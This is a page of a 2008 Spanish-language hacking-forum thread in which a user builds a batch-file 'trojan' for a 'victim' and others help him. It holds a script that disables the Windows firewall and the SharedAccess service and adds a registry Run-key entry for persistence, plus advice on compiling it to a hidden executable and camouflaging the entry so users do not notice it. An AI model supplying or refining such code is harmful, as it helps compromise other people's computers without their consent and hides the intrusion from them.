elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Como hacer funcionar este batch perfectamente?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 6 7 Ir Abajo Respuesta Imprimir
Autor Tema: Como hacer funcionar este batch perfectamente?  (Leído 24,972 veces)
Vlad_Asen

Desconectado Desconectado

Mensajes: 15


Ver Perfil WWW
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #10 en: 12 Enero 2008, 04:43 am »

Los archivos autoextraibles son ejecutables.


« Última modificación: 12 Enero 2008, 04:51 am por Vlad_Asen » En línea

CamaleonB

Desconectado Desconectado

Mensajes: 92


Chameleon Rock's


Ver Perfil WWW
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #11 en: 12 Enero 2008, 04:48 am »

Pero eso no es una conversion, es una especie de empaquetamiento...Igual yo no le veo mucha utilidad a la conversion....

Existen programas que lo que hacer es crear el batch y ejecutarlo...Pero en ningun momento transformarlo..

salu2


En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #12 en: 12 Enero 2008, 21:26 pm »

Y la ayuda que pedi :P Ya solucione todas esas cosas uso el Quick Batch Compiler en modo ghost y no aparece ni la ventana de msdos ni la ventana del explorer :D creo que ya esta la duda es que tengo ahora. Cuando vos le das doble click al troyano este desaparece y se crea la carpeta donde lo has puesto por ejemplo windows/system ahi se crea unois archivos la extension y el .exe que le pusiste el nombre. Si por ejemplo pierdo la victima ejecutando otra vez ese .exe es como ejecutar otra vez el troyano?
En línea

???

Desconectado Desconectado

Mensajes: 279


++ Elite Hacker ++


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #13 en: 13 Enero 2008, 02:45 am »

Los archivos autoextraibles son ejecutables.

Amigo pasate por la wikipedia, al crear Un SFX no conviertes el Batch a Aplicacion Win32, simplemente lo empaquetas!!!!...
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #14 en: 13 Enero 2008, 18:42 pm »

Si usas archivos adjuntos al EXE creado, algunas versiones del programa extraen estos archivos al directorio en que es ejecutado. Esto es demasiado ruidoso y alguna vez puede darte problemas.   ;)

Yo tengo la versión 2.1.6.0, y esta versión extrae los archivos en "%userprofile%\Configuración local\Datos de programa", cuando se termina el programa estos archivos son borrados. Y si quisieras copiar algun adjunto a otra ruta lo podrias hacer desde la variable de entorno %MYFILES% que crea QBFC.

Si el troyano lo has echo tu deberia comprobar cada vez que se ejecuta si ya esta instalado para decidir que hacer después.

PD: Por experiencia propia las aplicaciones que se quedan funcionando en segundo plano (con bucles), al apagar el sistema pueden devolver un error, no afectan al programa pero alertan al usuario. (mejor hacer pruebas)

Suerte
En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #15 en: 15 Enero 2008, 23:58 pm »

Una pregunta como haria para agregarlo al registro asi cuando se reinicia sigue ejecutandose.. ya que cuando por primera vez lo ejecuta y sigue bien pero al reiniciar ya no funcionaria mas no? Quiero que al reiniciar apagar el equipo,etc sigue funcionando jeje.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #16 en: 16 Enero 2008, 01:24 am »

Aqui lo tienes

http://foro.elhacker.net/index.php/topic,146876.0.html  :P

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #17 en: 16 Enero 2008, 16:15 pm »

Paa  no entendi nada  :( pero bueno nose si pùede ir esto con lo que lei el Bifrost tiene ActiveX si le tiro random y agarro uno y la agrego pero nose como podria seguir haciendolo otra opcion seria esto?

reg add "hklm\software\microsoft\windows\currentversion\run" /v mibat.bat /d %windir%\system32\mibat.bat /f

pero si hago eso se veria en el msconfig? o en algun otro lado ademas? mi batch se llama sys32.exe y estaria alojado en %Windir%system32\1234\sys32.exe entonces el registro tendria que ser asi

Código:
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f

Supuestamente lo agrega al inicio de windows pero entonces donde seria visible por msconfig ? o por inicio de programas? o nose.
En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #18 en: 16 Enero 2008, 17:46 pm »

Seria visible desde msconfig, también con cualquier programa que manipule el registro (regedit, RegCleaner...)
Por lo que: /v sys32.bat, mejor que sea un nombre que se camufle bien, ya que no tiene porque coincidir con el nombre de archivo.

Si con inicio de programas te refieres al del menú inicio, no. De esa forma es suficiente con copiar el archivo a ese directorio. Pero canta mucho y es más facil de eliminar.

Saludos
En línea

SoloAki

Desconectado Desconectado

Mensajes: 222


Ver Perfil
Re: Como hacer funcionar este batch perfectamente?
« Respuesta #19 en: 18 Enero 2008, 05:08 am »

Este script estaria bien_

Código:
Citar
@echo off
netsh firewall set opmode mode = DISABLE
pause
net stop SharedAccess
pause
REG ADD "hklm\software\microsoft\windows\currentversion\run" /v sys32.bat /d %windir%\system32\1234\sys32.bat /f
pause
:bucle
start /min explorer.exe
ping -n 120 localhost > nul
start /min explorer.exe
ping -n 120 localhost > nul
goto bucle
En línea

Páginas: 1 [2] 3 4 5 6 7 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Porque no puedo hacer ping ??? y sin embargo mi navegador entra perfectamente???
Redes
The_Saint 4 14,705 Último mensaje 9 Junio 2011, 23:48 pm
por madpitbull_99
Como hacer una consola batch
Scripting
zikotik 4 2,188 Último mensaje 8 Julio 2013, 17:43 pm
por OmarHack
Configura perfectamente tu WiFi con este programa
Noticias
wolfbcn 0 649 Último mensaje 10 Enero 2016, 21:22 pm
por wolfbcn
(solucionado) no consigo hacer funcionar un codigo batch
Scripting
hckcrck 6 1,992 Último mensaje 17 Junio 2016, 17:47 pm
por hckcrck
Hacer funcionar el lector de bandeja de discos con este lenguaje .net
.NET (C#, VB.NET, ASP)
Meta 7 3,366 Último mensaje 19 Noviembre 2017, 01:52 am
por Meta
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines